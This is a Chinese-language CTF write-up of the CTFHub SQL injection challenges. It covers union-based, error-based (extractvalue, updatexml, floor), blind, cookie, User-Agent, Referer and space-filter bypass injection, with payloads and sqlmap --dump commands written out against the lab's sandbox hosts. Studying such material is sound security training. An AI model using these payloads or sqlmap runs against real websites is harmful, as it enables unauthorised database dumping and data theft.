CTFHub-SQL注入

目录

SQL注入的原理

与MYSQL注入相关的知识点

注释符

内联注释

题目

整数型注入

字符型注入

报错注入

盲注

布尔盲注

时间盲注

cookie注入

UA注入

Refer注入

小结:收获颇多!!!


SQL注入的原理

SQL注入漏洞的产生需要满足以下两个条件。
(1)参数用户可控:前端传给后端的参数内容是用户可以控制的。
(2)参数代入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。
当传入的ID参数为1时,数据库执行的代码如下所示。

select * from users where id = 1'

这不符合数据库的语法规范,所以会报错。当传入的ID参数为and 1=1时,执行的SQL语句如下所示。

select * from users where id=1 and 1=1

因为1=1为真,且where语句中id=1也为真,所以页面会返回与id=1相同的结果。当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。

在实际环境中,凡是满足上述两个条件的参数皆可能存在SQL注入漏洞,因此开发者需秉承"外部参数皆不可信的原则"进行开发。

与MYSQL注入相关的知识点

在MYSQL5.0版本之后,MySQL默认在数据库中存放一个"information_schema"的数据库,在该库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。

SCHEMATA表存储该用户创建的所有数据库名的库名。

CTFHub-SQL注入_第1张图片

TABLES表存储该用户创建的所有的数据库的库名和表名,库名为:TABLES_SCHEMA,表名为:TABLE_NAME,字段名为:COLUMN_NAME.

MySQL查询语句

在不知道任何条件时,语句如下所示。

select 查询的字段名 from 库名.表名

在知道一条已知条件时,语句如下所示。

select 要查询的字段名 from 库名.表名 where 已知条件的字段名='已知条件的值'

limit的用法

limit的使用格式为limit m,n,其中m是指记录开始的位置,从0开始,表示第一条记录;n是指n条记录。例如limit 0,1表示从第一条记录开始,取一条记录,不使用limit和使用limit查询的结果

CTFHub-SQL注入_第2张图片

几个常用函数

database() 当前网站使用的数据库
version() 当前MySQL的版本
user() 当前MySQL的用户

注释符

在MySQL中,常见注释符的表达方式:#或--空格或/**/。

内联注释

内联注释的形式:

/*!code*/

内联注释可以用于整个sql语句中,用来执行SQL语句

-1 /*!union*/ /*!select*/ 1,2,3

题目

整数型注入

CTFHub-SQL注入_第3张图片

输个1试试:

CTFHub-SQL注入_第4张图片

再输入2-1,查询结果是1,说明存在整数型注入

CTFHub-SQL注入_第5张图片

尝试1 and 1=1和1 and 1=2,and没被过滤

1 and 1=1

CTFHub-SQL注入_第6张图片

1 and 1=2

CTFHub-SQL注入_第7张图片

再次尝试1 or 1=1和1 or 1=2,or没被过滤。

使用order by判断列名

1 order by 1,2

CTFHub-SQL注入_第8张图片

1 order by 1,2,3

CTFHub-SQL注入_第9张图片

只有两列。

使用union select 判断注入点

-1 union select 1,2

注入点在2的位置,爆库。

-1 union select 1,database();

CTFHub-SQL注入_第10张图片

拿到库名sqli,爆表。

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)

CTFHub-SQL注入_第11张图片

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 1,1)

CTFHub-SQL注入_第12张图片

爆出flag和news两个表名,使用flag表,爆字段名。

-1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)

CTFHub-SQL注入_第13张图片

拿到字段名flag,爆字段内容。

-1 union select 1,(select flag from sqli.flag limit 0,1)

CTFHub-SQL注入_第14张图片

成功拿到flag!!!

字符型注入

CTFHub-SQL注入_第15张图片

再输个1试试。

CTFHub-SQL注入_第16张图片

可知查询语句为:

select * from news where id='1'

我们输入的1被加上了单引号,当作字符。

输入1'判断为字符型注入:

CTFHub-SQL注入_第17张图片

使用#将后面的单引号注释掉

1'#

CTFHub-SQL注入_第18张图片

判断and是否被过滤

1' and 1=1#

CTFHub-SQL注入_第19张图片

1' and 1=2#

CTFHub-SQL注入_第20张图片

判断or是否被过滤,发现均未被过滤。

判断列数。

1' order by 1,2#

CTFHub-SQL注入_第21张图片

1' order by 1,2,3#

CTFHub-SQL注入_第22张图片

列数为两列,查找注入点。

-1' union select 1,2#

CTFHub-SQL注入_第23张图片

爆库名。

-1' union select 1,database()#

CTFHub-SQL注入_第24张图片

爆表名。

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

CTFHub-SQL注入_第25张图片

爆字段名。

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#

CTFHub-SQL注入_第26张图片

爆字段内容。

-1' union select 1,(select flag from flag)#

CTFHub-SQL注入_第27张图片

成功拿到flag!!!

报错注入

1'

CTFHub-SQL注入_第28张图片

1'#

CTFHub-SQL注入_第29张图片

判断注入:

当场景中仅仅将SQL语句带入查询返回页面正确,没有返回点的时候,需要报错注入,用报错的回显。

三种方法extractvalue() updatexml() floor()

extractvalue()

0x7e就是~用来区分数据,里面用select语句,不能用union select。

concat()函数
1.功能:将多个字符串连接成一个字符串。
2.语法:concat(str1,str2,…)
返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。

extractvalue报错注入语句格式:

?id=2 and extractvalue(null,concat(0x7e,(sql语句),0x7e))

爆库名。

1 and extractvalue(null,concat(0x7e,(database()),0x7e))

CTFHub-SQL注入_第30张图片

爆库成功,库名为sqli,爆表名。

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))

CTFHub-SQL注入_第31张图片

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))

CTFHub-SQL注入_第32张图片

得到两个表flag,news,爆字段名。

1 and extractvalue(null,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),0x7e))

CTFHub-SQL注入_第33张图片

得到字段flag,爆字段内容。

1 and extractvalue(null,concat(0x7e,(select flag from flag limit 0,1),0x7e))

CTFHub-SQL注入_第34张图片

得到一个不完整的flag。

只显示32位,很明显显示的flag不完全,我们需要借助mid函数来进行字符截取从而显示32位以后的数据。

SQL MID()语法:

select mid(column_name,start[,length]) from table_name

start[,length])表示显示范围。

1 1 and extractvalue(null,concat(0x7e,mid((select flag from flag),4),0x7e))

CTFHub-SQL注入_第35张图片

成功拿到flag!!!

updatexml()

爆库名。

1 and updatexml(1,concat(0x7e,database(),0x7e),1)

CTFHub-SQL注入_第36张图片

爆表名。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)

CTFHub-SQL注入_第37张图片

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

CTFHub-SQL注入_第38张图片

得到两个表news,flag。

爆字段名。

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'limit 0,1),0x7e),1)

CTFHub-SQL注入_第39张图片

爆字段内容。

1 and updatexml(1,concat(0x7e,(select flag from flag limit 0,1),0x7e),1)

CTFHub-SQL注入_第40张图片

同样需要mid函数。

1 and updatexml(1,concat(0x7e,mid((select flag from flag),4),0x7e),1)

CTFHub-SQL注入_第41张图片

成功拿到flag!!!

floor()

原理:利用

select count(*),floor(rand(0)*2)x from information_schema.character_sets group by x

导致数据库报错,通过concat函数连接注入语句与floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。

函数理解

打开MYSQL终端,创建数据库。

create database test1;

CTFHub-SQL注入_第42张图片

建表,设置两个字段。

use test1;

create table cze(id int unsigned not null primary key auto_increment,
name varchar(15) not null);

CTFHub-SQL注入_第43张图片

插入数据

insert into cze(id,name) value(1,'zhangsan');

insert into cze(id,name) value(2,'lisi');

insert into cze(id,name) value(3,'wangwu');

insert into cze(id,name) value(4,'laoliu');

CTFHub-SQL注入_第44张图片

rand()函数
rand()可以产生一个在0和1之间的随机数

select rand();

CTFHub-SQL注入_第45张图片

很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。

select rand(0);

CTFHub-SQL注入_第46张图片

floor(rand(0)*2)函数
floor函数的作用就是返回小于等于括号内该值的最大整数。
rand()本身是返回0~1的随机数,但在后面扩大2倍就返回0~2之间的随机数。
配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
结合上述的函数,每次产生的随机数列都是0 1 1 0

CTFHub-SQL注入_第47张图片

group by 函数
group by函数,作用就是分类汇总。
重命名id为a,name为x

select id a,name x from cze;

CTFHub-SQL注入_第48张图片

count()函数

count()函数作用为统计结果的记录数。

CTFHub-SQL注入_第49张图片

结合使用,统计0,1,数据,结果显示符合上面出现的0110

select count(*),floor(rand(0)*2) x from cze group by x;

CTFHub-SQL注入_第50张图片

实战

判断是否存在报错注入

1 union select count(*),floor(rand(0)*2) x from information_schema.schemata group by x

CTFHub-SQL注入_第51张图片

很明显存在报错注入,爆库。

1 union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by xs

CTFHub-SQL注入_第52张图片

得到库名sqli。

爆表名。

1 union select count(*),concat(floor(rand(0)*2),(select concat(table_name) from information_schema.tables 
where 
table_schema='sqli' limit 0,1)) x 
from 
information_schema.schemata group by x

CTFHub-SQL注入_第53张图片

爆字段名。

1 union select count(*),concat(floor(rand(0)*2),(select concat(column_name) from information_schema.columns 
where 
table_schema='sqli' and table_name='flag' limit 0,1)) x 
from 
information_schema.schemata group by x

CTFHub-SQL注入_第54张图片

得到字段flag,爆字段内容。

1 union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(flag) from sqli.flag limit 0,1)) x from information_schema.schemata group by x

CTFHub-SQL注入_第55张图片

成功拿到flag!!!

盲注

盲注其实是SQL注入的一种,之所以成为盲注是因为他不会根据你SQL注入的攻击语句返回你想要知道的错误信息。

布尔盲注

布尔盲注只会回显True和False两种情况。

这里我直接上手sqlmap,爆库名。

sqlmap -u "http://challenge-a42f003d4bd67bc2.sandbox.ctfhub.com:10800/?id=1" --dbs

CTFHub-SQL注入_第56张图片

前面三个是系统库所以直接使用sqli这个库。

爆表名。

sqlmap -u "http://challenge-a42f003d4bd67bc2.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

CTFHub-SQL注入_第57张图片

得到两个表,flag和news,使用flag表,直接爆字段内容。

sqlmap -u "http://challenge-a42f003d4bd67bc2.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag columns --dump

CTFHub-SQL注入_第58张图片

成功拿到flag!!!

时间盲注

时间盲注与Boolean注入的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MYSQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则if()的返回值为expr2;否则返回值则为expr3。

再次上手sqlmap,爆库。

sqlmap -u "http://challenge-b6a00c89c4ed6db8.sandbox.ctfhub.com:10800/?id=1" --dbs

CTFHub-SQL注入_第59张图片

前三个为系统库,使用第四个sqli库,爆表名。

sqlmap -u "http://challenge-b6a00c89c4ed6db8.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

CTFHub-SQL注入_第60张图片

得到两个表flag和news,选择flag表,直接爆字段内容。

sqlmap -u "http://challenge-b6a00c89c4ed6db8.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag columns --dump

CTFHub-SQL注入_第61张图片

成功拿到flag!!!

mysql结构

这里直接用sqlmap就可以跑出flag方法同上。

cookie注入

依旧sqlmap,爆库。

sqlmap -u "http://challenge-8cde6906c2de0431.sandbox.ctfhub.com:10800/" --cookie "id=1" --dbs --level 2

这里和上面不同的是多了两个命令,--cookie是指定http cookie的值,--level指执行的测试级别(1-5, 默认 1)。

需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.

CTFHub-SQL注入_第62张图片

接着爆表名。

sqlmap -u "http://challenge-8cde6906c2de0431.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli --tables --level 2

CTFHub-SQL注入_第63张图片

得到表名,直接爆字段内容。

sqlmap -u "http://challenge-8cde6906c2de0431.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli -T ksxiwztyzq --columns --dump --level 2

CTFHub-SQL注入_第64张图片

成功拿到flag!!!

UA注入

即注入点在User-Agent。

burp suite抓包。

CTFHub-SQL注入_第65张图片

测试or,and是否被过滤。

1 or 1=1
1 or 1=2

CTFHub-SQL注入_第66张图片

CTFHub-SQL注入_第67张图片

1 and 1=1
1 and 1=2

CTFHub-SQL注入_第68张图片

CTFHub-SQL注入_第69张图片

判断列数。

1 order by 1,2

CTFHub-SQL注入_第70张图片

1 order by 1,2,3

CTFHub-SQL注入_第71张图片

只有两列。

判断注入点。

-1 union select 1,2

CTFHub-SQL注入_第72张图片

找到注入点,爆库名。

-1 union select 1,database()

CTFHub-SQL注入_第73张图片

拿到库名,爆表名。

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 1,1)

CTFHub-SQL注入_第74张图片

拿到表名ogreadccrt,爆字段名。

-1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='ogreadccrt' limit 0,1)

CTFHub-SQL注入_第75张图片

拿到字段名bwpgchzncg。爆字段内容。

-1 union select 1,(select bwpgchzncg from sqli.ogreadccrt limit 0,1)

CTFHub-SQL注入_第76张图片

成功拿到flag!!!

Refer注入

直接上sqlmap。

爆库。

sqlmap -u "http://challenge-6c07a7d5a70843c1.sandbox.ctfhub.com:10800/?id=1" --referer "id=1" --dbs --level 2


CTFHub-SQL注入_第77张图片

拿到库名sqli,爆表名。

sqlmap -u "http://challenge-6c07a7d5a70843c1.sandbox.ctfhub.com:10800/?id=1" --referer "id=1" -D sqli --tables --level 2

CTFHub-SQL注入_第78张图片

拿到表名olzeykhcep,直接爆字段内容。

sqlmap -u "http://challenge-6c07a7d5a70843c1.sandbox.ctfhub.com:10800/?id=1" --referer "id=1" -D sqli -T olzeykhcep --columns --dump --level 2

CTFHub-SQL注入_第79张图片

成功拿到flag!!!

过滤空格

很可惜,这里不能直接上手sqlmap了,使用/**/绕过空格。

测试or,and是否被过滤。这里就不放图了,跟前面结果一致。

1/**/or/**/1=1
1/**/or/**/1=2

接下来就是order by判断列数,union select判断注入点,代码同上,只不过就是把有空格的地方替换成/**/,这里就不做演示了,内容已经够多了。

ctfhub的sql注入到这就结束了。

CTFHub-SQL注入_第80张图片

小结:收获颇多!!!

你可能感兴趣的:(web,sql,mysql,笔记)